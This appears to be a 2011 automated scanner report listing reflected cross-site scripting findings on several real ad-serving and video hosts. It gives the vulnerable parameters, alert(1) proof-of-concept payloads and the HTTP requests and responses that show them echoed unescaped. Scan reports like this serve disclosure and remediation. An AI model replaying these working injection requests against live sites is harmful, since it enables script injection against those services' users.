Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?72171"-alert(1)-"9f07e37a40c HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=BAADF1FD513A8859D5F71410BF463A8E; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:24 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc1ae"-alert(1)-"39b95d62acf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5031b"-alert(1)-"8b7f10a80f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c89ac"-alert(1)-"6db55c26a96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a15b"-alert(1)-"00b71c3e276 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d151e"-alert(1)-"833af767b5c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16677"-alert(1)-"52a76ba1058 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb23"-alert(1)-"d03d05de2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68857"-alert(1)-"35970ee03f4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760e5'%3balert(1)//b9ddebd4e1f was submitted in the h parameter. This input was echoed as 760e5';alert(1)//b9ddebd4e1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16&w=300&h=250760e5'%3balert(1)//b9ddebd4e1f&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 621 Date: Sun, 02 Oct 2011 22:54:06 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf733"%3balert(1)//776e245df9c was submitted in the pid parameter. This input was echoed as cf733";alert(1)//776e245df9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16cf733"%3balert(1)//776e245df9c&w=300&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 621 Date: Sun, 02 Oct 2011 22:54:03 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=75C8C16cf733";alert(1)//776e245df9c&rw=1&cm=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000804802%2Fmnum%3D0001075190%2Fcstr%3D35424750%3D_4e88eaf4%2C5017564884%2C804802%5E1075190%5E1184%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fb ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38cb2'%3balert(1)//96f10c267d5 was submitted in the w parameter. This input was echoed as 38cb2';alert(1)//96f10c267d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=75C8C16&w=30038cb2'%3balert(1)//96f10c267d5&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 621 Date: Sun, 02 Oct 2011 22:54:05 GMT Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1bf29<script>alert(1)</script>cf97cd26bdb was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5378<script>alert(1)</script>993b4f5c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /se5378<script>alert(1)</script>993b4f5c19/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 02 Oct 2011 23:00:13 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1427 Server: Jetty(6.1.19)
The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 8b9db<script>alert(1)</script>697e3b18685 was submitted in the feed parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips8b9db<script>alert(1)</script>697e3b18685&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:00:11 GMT Access-Control-Allow-Origin: * Content-Type: application/smil; charset=UTF-8 X-Cache: HIT from link.theplatform.com:80 Cache-Control: max-age=5 Connection: close Server: Jetty(6.1.19)
<smil xmlns="http://www.w3.org/2005/SMIL21/Language"> <head> </head> <body> <seq> <switch> <video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/261/fr_the_bridge_final_2500.mp4?hdnea=ip=50.23.123.1 ...[SNIP]... <param name="trackingData" value="b=333060|cc=US|ci=1|cid=1315664|d=1317596411266|l=135082|p=Homepage Player - Network HP Featured Clips8b9db<script>alert(1)</script>697e3b18685|rc=TX|rid=1315779"/> ...[SNIP]...
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload f888e<script>alert(1)</script>32e218dcb1f was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMILf888e<script>alert(1)</script>32e218dcb1f&Tracking=true&Embedded=true HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Date: Sun, 02 Oct 2011 23:00:11 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Connection: close Server: Jetty(6.1.19)
{ "title": "Unsupported Metafile Format", "description": "'SMILf888e<script>alert(1)</script>32e218dcb1f' is not a supported metafile format.", "isException": true, "exception": "UnsupportedFormat", "responseCode": "400" }
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 2f62d<script>alert(1)</script>a15e2a993fb was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=2082f62d<script>alert(1)</script>a15e2a993fb&width=378 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:09:14 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Content-Type: text/plain; charset=utf-8 Connection: close Server: Jetty(6.1.19)
{ "title": "Non-numeric Height", "description": "Height value '2082f62d<script>alert(1)</script>a15e2a993fb' is not numeric.", "isException": true, "exception": "NonNumericHeight", "responseCode": "400" }
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 40ee9<script>alert(1)</script>ad035f486cd was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=208&width=37840ee9<script>alert(1)</script>ad035f486cd HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:09:15 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Content-Type: text/plain; charset=utf-8 Connection: close Server: Jetty(6.1.19)
{ "title": "Non-numeric Width", "description": "Width value '37840ee9<script>alert(1)</script>ad035f486cd' is not numeric.", "isException": true, "exception": "NonNumericWidth", "responseCode": "400" }
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aad7e<script>alert(1)</script>13a34c04f95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /saad7e<script>alert(1)</script>13a34c04f95/fox.com/zcBJwfcpENJ_/tracker.log?type=qos&ver=2&d=1317596138497&cc=US&rc=TX&p=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&rid0=1315779&t0=The%20Bridge&tc0=1&lp0=583<0=0&pb0=100&pp0=0.43&pr0=0&nocache=1317596160823 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 02 Oct 2011 23:01:24 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1440 Server: Jetty(6.1.19)
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload ab61b<a>6ae5f203bfd was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:42 GMT Server: Apache/2.2 Content-Length: 563 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119ab61b<a>6ae5f203bfd&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='1196165203' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _ ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload a7ecb<a>11653f77f27 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:04:45 GMT Server: Apache/2.2 Content-Length: 468 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:04:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1a7ecb<a>11653f77f27&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='17116537727' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1279625536 2011.10. ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 5e057<a>9282d93155d was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:31 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:31 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=575e057<a>9282d93155d&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='200 ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 1cbfb<script>alert(1)</script>8f03840118e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:10 GMT Server: Apache/2.2 Content-Length: 1938 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:10 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlog.com.com/adlog/i/r=17584&sg=1815&o=1%253a&h=cn&p=2&b=571cbfb<script>alert(1)</script>8f03840118e&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e16:4E88DDCCDFF58&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=www. ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1c6'%3balert(1)//2484adf95d3 was submitted in the BRAND parameter. This input was echoed as fd1c6';alert(1)//2484adf95d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:03 GMT Server: Apache/2.2 Content-Length: 1121 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:03 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57fd1c6'%3balert(1)//2484adf95d3&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17828&sg=1815&o=1%253a&h=cn&p=2&b=57fd1c6';alert(1)//2484adf95d3&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e17:4E88AD4D3D3DC3&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=www ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload c3393*/alert(1)//d130cefde2e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:05 GMT Server: Apache/2.2 Content-Length: 1119 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57c3393*/alert(1)//d130cefde2e&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 99188<a>457eb383b9e was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:59:49 GMT Server: Apache/2.2 Content-Length: 511 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: text/plain Expires: Sun, 02 Oct 2011 22:59:49 GMT
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js99188<a>457eb383b9e&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 6122c*/alert(1)//2a51957cbdd was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:01:37 GMT Server: Apache/2.2 Content-Length: 1132 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:01:37 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=6122c*/alert(1)//2a51957cbdd&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 4f99c<a>f732ff8463b was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:02:19 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:02:19 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=4f99c<a>f732ff8463b&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEAC ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 18e97<a>24acc9741b7 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:56 GMT Server: Apache/2.2 Content-Length: 489 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 23:03:56 GMT
